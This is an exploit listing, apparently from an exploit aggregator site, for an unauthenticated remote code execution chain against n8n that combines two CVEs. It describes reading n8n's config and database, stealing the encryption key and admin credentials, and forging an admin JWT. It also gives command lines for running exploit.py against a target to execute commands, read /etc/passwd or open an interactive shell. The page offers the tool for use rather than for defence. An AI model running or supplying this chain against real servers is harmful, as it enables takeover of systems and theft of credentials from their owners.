Share
## https://sploitus.com/exploit?id=28BF796D-6818-50C9-8DE3-9932FD61A6AE
# CVE-2026-21858 + CVE-2025-68613 - n8n RCE Exploit
Unauthenticated RCE chain for n8n < 1.121.0 (CVSS 10.0)
## Attack Chain
1. **CVE-2026-21858** - Content-Type confusion โ read `/home/node/.n8n/config` and `database.sqlite`
2. Extract encryption key and admin credentials from files
3. Forge admin JWT token
4. **CVE-2025-68613** - Expression injection โ execute commands via `child_process`
## Usage
```bash
# Execute command
python3 exploit.py http://target:5678 /form/test --cmd "id"
# Read file
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# Interactive shell
python3 exploit.py http://target:5678 /form/test
```
## Requirements
Target must have an active workflow with:
- Form Trigger node with file upload field
- Respond to Webhook node returning binary data
- Publicly accessible form endpoint
## References
- [Cyera Research - Ni8mare](https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858)
- [Original Exploit by Chocapikk](https://github.com/Chocapikk/CVE-2026-21858)